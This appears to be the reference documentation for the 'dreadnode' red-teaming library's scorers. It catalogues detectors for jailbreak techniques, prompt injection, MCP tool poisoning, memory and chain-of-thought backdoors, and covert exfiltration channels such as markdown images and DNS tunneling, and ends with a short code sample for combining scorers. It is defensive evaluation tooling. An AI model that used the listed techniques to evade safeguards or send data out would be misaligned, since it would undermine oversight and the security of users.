Skip to content

Scorers Reference

130+ scorers across 34 modules for detecting jailbreaks, data leakage, tool abuse, reasoning attacks, and compliance violations.

Scorers evaluate attack outcomes - did the target jailbreak? Did it leak PII? Did an agent execute a poisoned tool? Every attack uses scorers automatically, and you can compose custom scoring pipelines for specialized detection.

Module: dreadnode.scorers.agentic_workflow

Detect attacks against agent workflow orchestration.

ScorerWhat it detects
phase_bypass_detectedAttempts to bypass phase transition approval
phase_downgrade_detectedDowngrade from post-exploitation to exploitation
tool_restriction_bypass_detectedBypass of tool access restrictions
sql_injection_via_nlp_detectedSQL injection through NLP processing
cypher_injection_detectedGraph database query injection
malformed_json_injection_detectedMalformed JSON injection
mode_confusion_detectedMode confusion attacks
intent_manipulation_detectedIntent manipulation in workflows
success_indicator_spoofing_detectedSpoofing of success indicators
todo_list_manipulation_detectedManipulation of task lists
tool_priority_manipulation_detectedTool priority/ordering manipulation
session_state_poisoning_detectedSession state poisoning
wordlist_exhaustion_detectedWordlist exhaustion attacks
workflow_disruption_detectedDisruption of workflow execution
agentic_workflow_attackGeneric agentic workflow attack detector

Module: dreadnode.scorers.agent_security

Detect attacks against agent infrastructure and identity.

ScorerWhat it detects
agent_identity_leakedLeakage of agent identity and configuration
skill_integrity_compromisedCompromised skill package integrity
agent_config_tamperedTampering with agent configuration
heartbeat_manipulationManipulation of agent heartbeat mechanisms
bootstrap_hook_injectedInjected bootstrap hooks in agent startup
skill_supply_chain_attackSkill supply chain attack indicators
memory_injection_detectedFalse memory injection
permission_escalation_detectedPermission escalation attempts
workspace_poisoning_detectedWorkspace file poisoning

Module: dreadnode.scorers.agentic

Score agent tool usage for safety and manipulation detection.

ScorerWhat it detects
tool_invokedWhether a specific tool was invoked
any_tool_invokedWhether any of specified tools were invoked
tool_countNumber of tools invoked
tool_selection_safetyAgent tool selection safety (OWASP ASI02)
dangerous_tool_argsDangerous argument patterns in tool calls
tool_sequenceWhether tools were called in a specific sequence
indirect_injection_successIndirect injection payload influenced output
cascade_propagationAttack propagation distance through multi-agent system
mcp_tool_manipulationMCP tool description poisoning affected behavior

Module: dreadnode.scorers.advanced_jailbreak_detection

Detect sophisticated jailbreak techniques.

ScorerWhat it detects
likert_exploitation_detectedLikert-scale evaluation framing to bypass filters
prefill_bypass_detectedPrefill/affirmative-start bypass attempts
fictional_framing_detectedDeep fictional immersion and nested role-play
pipeline_manipulation_detectedLLM processing pipeline manipulation
guardrail_dos_detectedGuardrail denial-of-service patterns
invisible_character_detectedInvisible Unicode characters bypassing filters
memory_poisoning_detectedAgent memory or persistent state poisoning
tool_chain_attack_detectedStructured tool-chain escalation attacks

Module: dreadnode.scorers.mcp_security

Detect attacks against the Model Context Protocol layer.

ScorerWhat it detects
tool_description_poisonedPoisoned instructions in MCP tool descriptions
cross_server_shadow_detectedCross-server tool shadowing
rug_pull_detectedMCP rug pull attacks
tool_output_injectedInjection into tool output handling
schema_poisonedPoisoned tool schemas
ansi_cloaking_detectedANSI escape cloaking in tool descriptions
sampling_injection_detectedSampling parameter injection

Module: dreadnode.scorers.multi_agent_security

Detect inter-agent attacks and trust boundary violations.

ScorerWhat it detects
prompt_infection_detectedSelf-replicating prompt infection patterns
agent_spoofing_detectedAgent spoofing/identity fraud
consensus_poisonedConsensus poisoning attacks
delegation_exploit_detectedDelegation chain exploitation
session_smuggling_detectedSession smuggling in agent-to-agent communication
agent_config_overwrite_detectedAgent configuration overwriting

Module: dreadnode.scorers.reasoning_security

Detect attacks against chain-of-thought and reasoning models.

ScorerWhat it detects
cot_backdoor_detectedPoisoned reasoning steps in chain-of-thought
reasoning_hijack_detectedReasoning hijacking attacks
reasoning_dos_detectedReasoning denial-of-service
escalation_detectedMulti-turn escalation (Crescendo, FITD)
goal_drift_detectedGoal drift in agent systems

Module: dreadnode.scorers.ide_security

Detect attacks targeting coding assistants and IDE integrations.

ScorerWhat it detects
config_persistenceConfiguration file modifications for persistence
rug_pull_detectionRug pull attacks on coding assistants
shadowing_detectionTool shadowing attacks
tool_squattingTool squatting attacks
covert_exfiltrationCovert exfiltration via IDE

Module: dreadnode.scorers.documentation_security

Detect documentation-based injection and exfiltration.

ScorerWhat it detects
hidden_documentation_injectionHidden instructions in docs targeting AI
env_var_exfiltrationEnvironment variable exfiltration via docs
favicon_exfiltrationFavicon-based data exfiltration
resource_hint_exfilResource hint-based exfiltration
package_readme_poisoningPoisoning of package README files

Module: dreadnode.scorers.contains

Pattern-based content detection.

ScorerWhat it detects
containsWhether output contains a specific string or regex
detect_refusalRefusal patterns in model output
detect_ansi_escapesANSI escape codes in output
detect_unsafe_shell_contentUnsafe shell commands/paths
detect_sensitive_keywordsSensitive keywords (passwords, API keys)

Module: dreadnode.scorers.exfiltration_detection

Detect data exfiltration through covert channels.

ScorerWhat it detects
markdown_exfil_detectedMarkdown image/link-based exfiltration
unicode_exfil_detectedUnicode-based exfiltration
dns_exfil_detectedDNS tunneling exfiltration
ssrf_exfil_detectedSSRF-based exfiltration

Modules: dreadnode.scorers.pii, dreadnode.scorers.credentials

ScorerWhat it detects
detect_piiPII patterns (email, phone, IP, SSN) via regex
detect_pii_with_presidioPII using Microsoft Presidio analyzer
credential_leakageAPI keys, tokens, passwords (16 credential patterns)

Module: dreadnode.scorers.prompt_leak

ScorerWhat it detects
system_prompt_leakedSystem prompt content in model output

Modules: dreadnode.scorers.judge, dreadnode.scorers.harm

ScorerWhat it detects
llm_judgeLLM-based semantic judgment (configurable criteria)
detect_harm_with_openaiHarmful content via OpenAI moderation API

Module: dreadnode.scorers.classification

ScorerWhat it detects
zero_shot_classificationZero-shot text classification
detect_refusal_with_zero_shotRefusal detection via zero-shot classifier

Module: dreadnode.scorers.attack_outcome

Evaluate the practical impact of successful attacks.

ScorerWhat it detects
malicious_intent_fulfilledWhether the model’s output fulfills the attacker’s malicious intent
practical_outcomeWhether the output has practical real-world utility for harm
cumulative_harmCumulative harm across multi-turn conversations
resilience_gapGap between model’s intended safety and actual behavior

Module: dreadnode.scorers.judge_ensemble

Multi-judge and rubric-based scoring for more reliable evaluation.

ScorerWhat it detects
multi_judge_consensusConsensus scoring across multiple LLM judges
rubric_judgeRubric-based scoring with structured evaluation criteria
agent_as_judgeAgent-based evaluation with tool access

Module: dreadnode.scorers.structural_detection

Detect structural exploit patterns in model outputs.

ScorerWhat it detects
template_exploit_detectedTemplate-based exploit patterns
m2s_reformatting_detectedMulti-step to single-step reformatting attacks
echo_chamber_detectedEcho chamber / completion bias exploitation
stego_acrostic_detectedSteganographic acrostic patterns

Module: dreadnode.scorers.supply_chain_detection

Detect supply chain attack indicators.

ScorerWhat it detects
package_hallucinationHallucinated package names that could be registered by attackers
merge_backdoor_detectedBackdoor indicators in model merge outputs
skill_poisoning_detectedSkill/plugin poisoning patterns
ModuleScorersDescription
similarity5Semantic similarity (sentence transformers, TF-IDF, LiteLLM, BLEU)
sentiment2Sentiment analysis, Perspective API
length3Text length targeting, ratio, range
format2JSON/XML validation
readability1Text readability level
lexical1Type-token ratio (vocabulary diversity)
consistency1Character-level consistency
memorization1Training data memorization

Module: dreadnode.core.scorer

Combine scorers with logical and arithmetic operators:

from dreadnode.scorers import detect_pii, credential_leakage, system_prompt_leaked
from dreadnode.core.scorer import or_, and_, avg, threshold, invert
# Score 1.0 if ANY leakage is detected
any_leak = or_(detect_pii(), credential_leakage(), system_prompt_leaked())
# Average of multiple scorers
combined = avg(detect_pii(), credential_leakage())
# Invert a score (1 - x)
no_refusal = invert(detect_refusal())
# Apply threshold
jailbreak = threshold(llm_judge(criteria="..."), value=0.7)

Available operators: add, and_, avg, clip, equals, forward, invert, normalize, not_, or_, remap_range, scale, subtract, threshold, weighted_avg